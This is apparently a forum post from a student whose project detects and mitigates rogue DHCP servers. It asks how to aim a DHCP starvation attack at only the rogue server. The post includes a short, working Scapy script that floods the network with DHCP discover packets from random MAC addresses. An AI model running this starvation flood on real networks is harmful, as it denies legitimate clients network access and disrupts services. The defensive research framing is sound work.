So for a project i'm trying to detect and mitigate rogue DHCP servers on networks. I had everything done, I created a script which would construct discovery packets (with Scapy), if more than one response is detected, I have another script which will DoS all DHCP servers on a network with DHCP starvation and that worked okay.
However I met up with my project supervisor today and he told me that I should only DoS the DHCP server that is rogue, where my script DoSes ALL DHCP servers.
I have no idea how I would go about this. Has anyone any ideas?
from scapy.all import *
from time import sleep
from threading import Thread
conf.checkIPaddr = False
pkt = Ether(src=RandMAC(), dst='ff:ff:ff:ff:ff:ff')
pkt /= IP(src='0.0.0.0', dst='255.255.255.255')
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr=RandString(12, '0123456789abcdef'))
pkt /= DHCP(options=[('message-type', 'discover'), 'end'])
sendp(pkt, loop=1)